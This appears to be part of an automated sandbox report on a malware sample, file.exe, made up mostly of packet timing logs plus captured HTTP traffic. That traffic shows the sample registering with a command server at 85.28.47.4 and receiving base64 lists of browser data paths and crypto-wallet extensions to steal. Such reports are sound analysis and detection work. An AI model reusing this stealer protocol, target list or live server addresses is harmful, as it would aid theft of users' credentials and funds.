Jul 3, 2024 18:09:55.351218939 CEST	80	62970	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:56.018450022 CEST	80	62970	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:56.018554926 CEST	62970	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:56.019319057 CEST	62970	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:56.024106026 CEST	80	62970	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:56.230688095 CEST	80	62970	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:56.230786085 CEST	62970	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:56.339740992 CEST	62970	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:56.340051889 CEST	62971	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:56.344976902 CEST	80	62971	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:56.345102072 CEST	62971	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:56.345269918 CEST	80	62970	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:56.345293999 CEST	62971	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:56.345324039 CEST	62970	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:56.350085020 CEST	80	62971	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:56.794784069 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:56.794877052 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:57.050031900 CEST	80	62971	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:57.050168037 CEST	62971	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:57.052906036 CEST	62971	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:57.058032036 CEST	80	62971	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:57.287242889 CEST	80	62971	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:57.287302971 CEST	62971	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:57.402232885 CEST	62971	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:57.402698994 CEST	62972	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:57.407548904 CEST	80	62971	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:57.407561064 CEST	80	62972	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:57.407674074 CEST	62971	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:57.407819033 CEST	62972	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:57.407903910 CEST	62972	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:57.412679911 CEST	80	62972	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:58.114203930 CEST	80	62972	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:58.114288092 CEST	62972	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:58.115057945 CEST	62972	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:58.120440960 CEST	80	62972	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:58.338197947 CEST	80	62972	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:58.338296890 CEST	62972	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:58.449074984 CEST	62972	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:58.449404001 CEST	62973	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:58.454298019 CEST	80	62972	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:58.454327106 CEST	80	62973	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:58.454355001 CEST	62972	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:58.454411030 CEST	62973	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:58.454562902 CEST	62973	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:58.460553885 CEST	80	62973	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:59.131092072 CEST	80	62973	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:59.131198883 CEST	62973	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:59.131861925 CEST	62973	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:59.136677980 CEST	80	62973	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:59.378933907 CEST	80	62973	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:59.379031897 CEST	62973	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:59.480345964 CEST	62973	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:59.480709076 CEST	62975	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:59.485615015 CEST	80	62975	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:59.485738993 CEST	62975	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:59.486027002 CEST	62975	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:59.490915060 CEST	80	62975	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:59.492764950 CEST	80	62973	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:59.492835999 CEST	62973	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:00.184576988 CEST	80	62975	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:00.184631109 CEST	62975	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:00.185431004 CEST	62975	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:00.191282034 CEST	80	62975	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:00.416002989 CEST	80	62975	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:00.416094065 CEST	62975	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:00.527122021 CEST	62975	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:00.527472019 CEST	62976	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:00.534893036 CEST	80	62975	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:00.535012007 CEST	62975	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:00.535072088 CEST	80	62976	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:00.535146952 CEST	62976	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:00.535399914 CEST	62976	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:00.540738106 CEST	80	62976	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:01.213854074 CEST	80	62976	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:01.214241028 CEST	62976	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:01.216717005 CEST	62976	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:01.221560955 CEST	80	62976	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:01.431201935 CEST	80	62976	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:01.431260109 CEST	62976	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:01.542701006 CEST	62976	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:01.543052912 CEST	62977	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:01.548314095 CEST	80	62977	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:01.548643112 CEST	80	62976	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:01.548743963 CEST	62976	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:01.548953056 CEST	62977	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:01.548953056 CEST	62977	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:01.554215908 CEST	80	62977	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:02.245810032 CEST	80	62977	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:02.246247053 CEST	62977	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:02.246881008 CEST	62977	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:02.251713991 CEST	80	62977	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:02.465689898 CEST	80	62977	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:02.466221094 CEST	62977	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:02.574139118 CEST	62977	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:02.574449062 CEST	62978	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:02.579442978 CEST	80	62978	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:02.580380917 CEST	80	62977	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:02.580449104 CEST	62977	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:02.580466986 CEST	62978	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:02.585093975 CEST	62978	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:02.590272903 CEST	80	62978	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:03.291254997 CEST	80	62978	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:03.291312933 CEST	62978	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:03.300942898 CEST	62978	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:03.305763960 CEST	80	62978	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:03.525115013 CEST	80	62978	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:03.525202990 CEST	62978	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:03.695386887 CEST	62978	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:03.695694923 CEST	62979	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:03.701014042 CEST	80	62979	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:03.701107025 CEST	62979	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:03.701267004 CEST	62979	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:03.701360941 CEST	80	62978	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:03.701425076 CEST	62978	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:03.707031965 CEST	80	62979	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:04.516618967 CEST	80	62979	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:04.517307043 CEST	62979	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:04.520318985 CEST	62979	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:04.525293112 CEST	80	62979	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:04.741750956 CEST	80	62979	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:04.742193937 CEST	62979	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:04.863097906 CEST	62979	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:04.863534927 CEST	62980	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:04.868340969 CEST	80	62979	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:04.868458986 CEST	80	62980	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:04.868525028 CEST	62979	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:04.868539095 CEST	62980	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:04.875297070 CEST	62980	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:04.875837088 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:10:04.880712986 CEST	80	62980	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:04.880742073 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:10:05.565099955 CEST	80	62980	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:05.566243887 CEST	62980	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:05.568928003 CEST	62980	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:05.569255114 CEST	62981	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:05.576569080 CEST	80	62981	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:05.576625109 CEST	62981	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:05.577917099 CEST	80	62980	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:05.577974081 CEST	62980	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:05.685748100 CEST	62982	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:05.690601110 CEST	80	62982	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:05.694250107 CEST	62982	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:05.694552898 CEST	62982	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:10:05.699826002 CEST	80	62982	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:06.380052090 CEST	80	62982	77.91.77.82	192.168.2.6
Jul 3, 2024 18:10:06.380115986 CEST	62982	80	192.168.2.6	77.91.77.82

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 3, 2024 18:08:31.299707890 CEST	53	57921	162.159.36.2	192.168.2.6
Jul 3, 2024 18:08:31.809963942 CEST	53363	53	192.168.2.6	1.1.1.1
Jul 3, 2024 18:08:31.817274094 CEST	53	53363	1.1.1.1	192.168.2.6
Jul 3, 2024 18:08:33.023215055 CEST	63793	53	192.168.2.6	1.1.1.1
Jul 3, 2024 18:08:33.035089016 CEST	53	63793	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 3, 2024 18:08:31.809963942 CEST	192.168.2.6	1.1.1.1	0xa06a	Standard query (0)	18.31.95.13.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Jul 3, 2024 18:08:33.023215055 CEST	192.168.2.6	1.1.1.1	0x473	Standard query (0)	86.23.85.13.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 3, 2024 18:08:31.817274094 CEST	1.1.1.1	192.168.2.6	0xa06a	Name error (3)	18.31.95.13.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Jul 3, 2024 18:08:33.035089016 CEST	1.1.1.1	192.168.2.6	0x473	Name error (3)	86.23.85.13.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

85.28.47.4

77.91.77.81

77.91.77.82

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49710	85.28.47.4	80	4368	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:08:00.820247889 CEST	408	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDAAKEHJDHJKEBFHJEGD Host: 85.28.47.4 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 35 44 41 37 38 41 38 42 31 45 37 33 30 39 39 33 30 35 32 31 35 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6a 6f 6e 79 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 2d 2d 0d 0a Data Ascii: ------IDAAKEHJDHJKEBFHJEGDContent-Disposition: form-data; name="hwid"75DA78A8B1E73099305215------IDAAKEHJDHJKEBFHJEGDContent-Disposition: form-data; name="build"jony------IDAAKEHJDHJKEBFHJEGD--
Jul 3, 2024 18:08:01.484047890 CEST	384	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 16:08:01 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 156 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 7a 51 7a 59 57 4e 68 4e 57 51 77 4e 32 55 31 4e 32 4d 79 4f 44 51 7a 4f 47 5a 6c 5a 54 6b 77 59 6d 59 79 5a 6a 56 6a 5a 44 6b 7a 4d 44 55 34 4e 7a 55 34 4e 7a 51 35 5a 6a 51 7a 4e 32 45 78 59 6d 4e 6c 59 57 4d 34 4e 6a 45 32 4f 54 41 78 5a 54 63 34 4f 54 45 79 4e 6a 5a 6a 4e 44 41 79 66 47 70 69 5a 48 52 68 61 57 70 76 64 6d 64 38 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d Data Ascii: MzQzYWNhNWQwN2U1N2MyODQzOGZlZTkwYmYyZjVjZDkzMDU4NzU4NzQ5ZjQzN2ExYmNlYWM4NjE2OTAxZTc4OTEyNjZjNDAyfGpiZHRhaWpvdmd8ZWltZWhydnpvZC5maWxlfDB8MHwxfDF8MXwxfDF8MXw=
Jul 3, 2024 18:08:01.507829905 CEST	465	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFB Host: 85.28.47.4 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 2d 2d 0d 0a Data Ascii: ------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="message"browsers------GDHIDHIEGIIIECAKEBFB--
Jul 3, 2024 18:08:01.688433886 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 16:08:01 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Jul 3, 2024 18:08:01.688766003 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Jul 3, 2024 18:08:01.724903107 CEST	464	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIIIECBGDHJJKFIDAKJD Host: 85.28.47.4 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 2d 2d 0d 0a Data Ascii: ------GIIIECBGDHJJKFIDAKJDContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------GIIIECBGDHJJKFIDAKJDContent-Disposition: form-data; name="message"plugins------GIIIECBGDHJJKFIDAKJD--
Jul 3, 2024 18:08:01.906327963 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 16:08:01 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 5416 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
